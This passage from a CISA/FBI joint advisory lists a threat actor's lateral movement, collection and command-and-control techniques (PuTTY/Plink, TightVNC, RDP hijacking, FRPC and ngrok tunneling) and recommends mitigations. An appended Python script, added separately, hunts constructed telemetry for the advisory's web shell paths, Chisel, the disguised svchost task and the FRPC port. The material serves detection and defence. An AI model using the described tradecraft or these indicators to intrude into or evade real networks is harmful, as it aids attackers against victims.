pervasively on several hosts. 
The threat actor was also observed using a valid account to access SMB shares.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1021/004/">T1021.004</a></p> </td> <td scope="col" style="width: 254px;">Remote Services: SSH</td> <td scope="col" style="width: 424px;">The threat actor used Plink and PuTTY for lateral movement. Artifacts of Plink being used for encrypted sessions were present in the system registry hive.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1021/005/">T1021.005</a></p> </td> <td scope="col" style="width: 254px;">Remote Services: Virtual Network Computing (VNC)</td> <td scope="col" style="width: 424px;">The threat actor installed TightVNC server and client pervasively on compromised servers and endpoints in the network environment as a lateral movement tool.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1563/002/">T1563.002</a></p> </td> <td scope="col" style="width: 254px;">Remote Service Session Hijacking: RDP Hijacking</td> <td scope="col" style="width: 424px;">The threat actor likely hijacked a legitimate RDP session to move laterally within the network environment.</td> </tr> </tbody> </table> <h4>Collection</h4> <p>CISA observed the threat actor using the techniques identified in table 9 for collection within the victim environment.</p> <p class="italic text-align-center"><em>Table 9: Collection techniques</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" height="180" style="margin-left: auto; margin-right: auto;" width="955"> <thead> <tr> <th scope="col" style="width: 125px;"> <p>ID</p> </th> <th scope="col" style="width: 254px;"> <p>Technique/Sub-Technique</p> </th> <th scope="col" style="width: 424px;"> <p>Context</p> </th> </tr> </thead> <tbody> <tr> <td scope="col" style="width: 125px;"> <p><a 
href="https://attack.mitre.org/techniques/T1005/">T1005</a></p> </td> <td scope="col" style="width: 254px;">Data from Local System</td> <td scope="col" style="width: 424px;">The threat actor searched local system sources to access sensitive documents.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1039/">T1039</a></p> </td> <td scope="col" style="width: 254px;">Data from Network Shared Drive</td> <td scope="col" style="width: 424px;">The threat actor searched network shares to access sensitive documents.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1213/">T1213</a></p> </td> <td scope="col" style="width: 254px;">Data from Information Repositories</td> <td scope="col" style="width: 424px;">The threat actor accessed victim security/IT monitoring environments, Microsoft Teams, etc., to mine valuable information.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1530/">T1530</a></p> </td> <td scope="col" style="width: 254px;">Data from Cloud Storage Object</td> <td scope="col" style="width: 424px;">The threat actor obtained files from the victim cloud storage instances.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1560/001/">T1560.001</a></p> </td> <td scope="col" style="width: 254px;">Archive Collected Data: Archive via Utility</td> <td scope="col" style="width: 424px;">The threat actor used 7-Zip to archive data.</td> </tr> </tbody> </table> <h4>Command and Control</h4> <p>CISA observed the threat actor using the techniques identified in table 10 for command and control (C2).</p> <p class="italic text-align-center"><em>Table 10: Command and control techniques</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" height="180" style="margin-left: auto; margin-right: auto;" width="955"> <thead> <tr> <th scope="col" 
style="width: 125px;"> <p>ID</p> </th> <th scope="col" style="width: 254px;"> <p>Technique/Sub-Technique</p> </th> <th scope="col" style="width: 424px;"> <p>Context</p> </th> </tr> </thead> <tbody> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1071/001/">T1071.001</a></p> </td> <td scope="col" style="width: 254px;">Application Layer Protocol: Web Protocols</td> <td scope="col" style="width: 424px;">The threat actor used various web mechanisms and protocols, including the web shells listed in table 1.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1105/">T1105</a></p> </td> <td scope="col" style="width: 254px;">Ingress Tool Transfer</td> <td scope="col" style="width: 424px;">The threat actor downloaded tools such as PsExec directly to endpoints and downloaded web shells and scripts to NetScaler in base64-encoded schemes.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1572/">T1572</a></p> </td> <td scope="col" style="width: 254px;">Protocol Tunneling</td> <td scope="col" style="width: 424px;">The threat actor used <code>FRPC.exe</code> to tunnel RDP over port 443. 
The threat actor has also been observed using ngrok for tunneling.</td> </tr> </tbody> </table> <h4>Exfiltration</h4> <p>CISA currently has no evidence of data exfiltration from this threat actor but assesses that it was likely due to the use of 7-Zip and viewing of sensitive documents.</p> <h3>Mitigations</h3><h4>Recommendations</h4> <p>CISA and FBI recommend implementing the following recommendations.</p> <ul> <li>If your organization has not patched for the Citrix CVE-2019-19781 vulnerability, and a compromise is suspected, follow the recommendations in CISA Alert <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-031a">AA20-031A</a>.</li> <li>This threat actor has been observed targeting other CVEs mentioned in this report; follow the recommendations in the CISA resources provided below.</li> <li>If using Windows Active Directory and compromise is suspected, conduct remediation of the compromised Windows Active Directory forest. <ul> <li>If compromised, rebuild/reimage compromised NetScaler devices.</li> </ul> </li> <li>Routinely audit configuration and patch management programs.</li> <li>Monitor network traffic for unexpected and unapproved protocols, especially outbound to the internet (e.g., SSH, SMB, RDP).</li> <li>Implement multi-factor authentication, especially for privileged accounts.</li> <li>Use separate administrative accounts on separate administration workstations.</li> <li>Implement the principle of least privilege on data access.</li> <li>Secure RDP and other remote access solutions using multifactor authentication and “jump boxes” for access.</li> <li>Deploy endpoint defense tools on all endpoints; ensure they work and are up to date.</li> <li>Keep software up to date.</li> </ul> <h3>Contact Information</h3><p>To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <a href="https://www.fbi.gov/contact-us/field-offices">www.fbi.gov/contact-us/field</a>, or 
the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at <a href="mailto:CyWatch@fbi.gov">CyWatch@fbi.gov</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at <a href="mailto:Central@cisa.dhs.gov">central@cisa.dhs.gov</a>.</p> <h3>Resources</h3> <p><a href="https://us-cert.cisa.gov/ncas/alerts/aa20-031a">CISA Alert AA20-031A: Detecting Citrix CVE-2019-19781</a><br /> <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-073a">CISA Alert AA20-073A: Enterprise VPN Security</a><br /> <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-107a">CISA Alert AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching</a><br /> <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-206a">CISA Alert AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902</a><br /> <a href="https://us-cert.cisa.gov/ncas/tips/ST18-001">CISA Security Tip: Securing Network Infrastructure Devices</a></p> <h3>Revisions</h3> <ul> <li>September 15, 2020: Initial Version</li> </ul> <hr /> <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p class="privacy-and-terms">This product is provided subject to this <a href="https://us-cert.cisa.gov/privacy/notification">Notification</a> and this <a href="https://www.dhs.gov/privacy-policy">Privacy &amp; Use</a> policy.</p> </div>
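<p>As an added hunting example (not part of the CISA/FBI advisory), the following Python checks constructed telemetry records against the indicators this advisory gives: the NetScaler web shell and Chisel file paths, the <code>lpupdate</code> scheduled task running a binary named <code>svchost</code>, the <code>dllhost.dll</code> configuration name, <code>cmd.exe</code> spawned via sticky keys (<code>sethc.exe</code>), the <code>httpd-nscache_clean</code> cleanup, and connections to FRPC port 7557. The record schema, the sample telemetry, and the assumption that a genuine <code>svchost</code> lives under System32 are constructed here and are not taken from the advisory.</p>

```python
"""Hunt constructed telemetry for host and network indicators listed in this advisory.

Added example, not part of the CISA/FBI advisory: the indicator values come from the
advisory text; the record schema and sample telemetry below are constructed here."""
import posixpath
from typing import Dict, Iterable, List, Tuple

# NetScaler file paths the advisory associates with web shells and Chisel.
NETSCALER_PATHS = {
    "/netscaler/ns_gui/admin_ui/rdx/core/css/images/css.php": ("Tiny web shell", "T1505.003"),
    "/netscaler/ns_gui/vpn/images/vpn_ns_gui.php": ("Tiny web shell", "T1505.003"),
    "/var/vpn/themes/imgs/tiny.php": ("Tiny web shell", "T1505.003"),
    "/var/vpn/themes/imgs/debug.php": ("ChunkyTuna web shell", "T1505.003"),
    "/var/vpn/themes/imgs/include.php": ("ChunkyTuna web shell", "T1505.003"),
    "/var/vpn/themes/imgs/whatfile": ("ChunkyTuna web shell", "T1505.003"),
    "/var/nstmp/chisel": ("Chisel", "T1572"),
}
FRPC_PORT = 7557  # FRPC port reported by CISA and the FBI
Hit = Tuple[str, str]  # (ATT&CK technique ID, reason)

def _base(path: str) -> str:
    """Lower-case basename that tolerates Windows or POSIX separators."""
    return posixpath.basename(path.replace("\\", "/").lower())

def check_record(rec: Dict[str, str]) -> List[Hit]:
    """Return every advisory indicator that one telemetry record matches."""
    hits: List[Hit] = []
    kind = rec.get("type")
    if kind == "file":
        # normpath collapses '..' so the comparison is on the canonical path
        path = posixpath.normpath(rec.get("path", ""))
        if path in NETSCALER_PATHS:
            label, tech = NETSCALER_PATHS[path]
            hits.append((tech, f"{label} path present: {path}"))
    elif kind == "task":
        image = rec.get("image", "").replace("\\", "/").lower()
        if rec.get("name", "").lower() == "lpupdate":
            hits.append(("T1053.005", "scheduled task named lpupdate"))
        # Assumption: a genuine svchost lives under System32; the advisory's FRPC
        # copy was named svchost and ran from the IME directory instead.
        if _base(image) in ("svchost", "svchost.exe") and "/system32/" not in image:
            hits.append(("T1036.005", f"svchost outside System32: {image}"))
    elif kind == "process":
        cmdline = rec.get("cmdline", "").lower()
        if _base(rec.get("parent", "")) == "sethc.exe" and _base(rec.get("image", "")) == "cmd.exe":
            hits.append(("T1546.008", "cmd.exe spawned by sticky keys (sethc.exe)"))
        if "httpd-nscache_clean" in cmdline:
            hits.append(("T1070.004", "httpd-nscache_clean cleanup run"))
        if "dllhost.dll" in cmdline:
            hits.append(("T1036.005", "configuration file masquerading as dllhost.dll"))
    elif kind == "netconn":
        if int(rec.get("dst_port", "0")) == FRPC_PORT:
            hits.append(("T1572", f"outbound connection to FRPC port {FRPC_PORT}"))
    return hits

def hunt(records: Iterable[Dict[str, str]]) -> Dict[str, List[str]]:
    """Group hits by ATT&CK technique across a batch of records."""
    out: Dict[str, List[str]] = {}
    for rec in records:
        for tech, why in check_record(rec):
            out.setdefault(tech, []).append(why)
    return out

# Constructed sample telemetry: two benign records mixed in with the matches.
SAMPLE: List[Dict[str, str]] = [
    {"type": "file", "path": "/var/vpn/themes/imgs/../imgs/debug.php"},
    {"type": "file", "path": "/var/vpn/themes/imgs/logo.png"},
    {"type": "task", "name": "lpupdate", "image": r"C:\Windows\IME\svchost.exe"},
    {"type": "task", "name": "Backup", "image": r"C:\Windows\System32\svchost.exe"},
    {"type": "process", "parent": r"C:\Windows\System32\sethc.exe", "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"type": "process", "parent": "sh", "image": "sh", "cmdline": "./httpd-nscache_clean"},
    {"type": "netconn", "dst_port": "7557"},
]

if __name__ == "__main__":
    for tech, reasons in sorted(hunt(SAMPLE).items()):
        print(tech, reasons)
```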